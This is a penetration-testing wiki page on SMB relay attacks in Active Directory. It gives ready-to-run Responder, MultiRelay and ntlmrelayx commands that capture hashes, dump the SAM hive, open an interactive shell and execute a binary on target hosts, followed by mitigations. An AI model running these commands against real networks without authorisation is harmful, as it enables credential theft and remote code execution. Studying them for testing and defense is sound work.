📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • What is SMB Relay?
  • Requirements
  • Exploitation
  • Mitigation
  1. Active Directory
  2. MITM & Relay Attacks

SMB Relay

What is SMB Relay?

  • Capture hashes

  • Relay them to other hosts to authenticate

  • No need to crack hashes with hashcat

Requirements

  • SMB signing must be disabled on the target

  • SMB signing checks authenticity of SMB packets

  • Relayed user credentials must be admin on target machine

Exploitation

# Discover hosts with SMB signing disabled
python RunFinger.py -i 10.0.0.2/24
nmap --script=smb2-security-mode -p 445 -v 10.10.10.0/24

# Turn off HTTP and SMB in Responder.conf
nvim Responder.conf

# Start responder
python Responder.py -I tun0 -rdwv

# Set up relay

# Target specific host
python MultiRelay.py -t 10.0.2.4 -u ALL

# Target multiple hosts

# Dump SAM hive
python ntlmrelayx.py -tf targets.txt -smb2support

# Interactive SMB shell
python ntlmrelayx.py -tf targets.txt -smb2support -i
nc 127.0.0.1 11000

# Execute command
python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Execute binary
python ntlmrelayx.py -tf targets.txt -smb2support -e "shell.exe"

Mitigation

  • Enable SMB signing on all devices (may cause performance issues with file copies)

  • Disable NTLM authentication on the network but Windows can default back to it if Kerberos stops working

  • Account tiering: limit domain admins to specific tasks

  • Local admin restriction (can increase service deskt tickets)

PreviousLLMNR PoisoningNextIPv6 Attacks

Last updated 2 years ago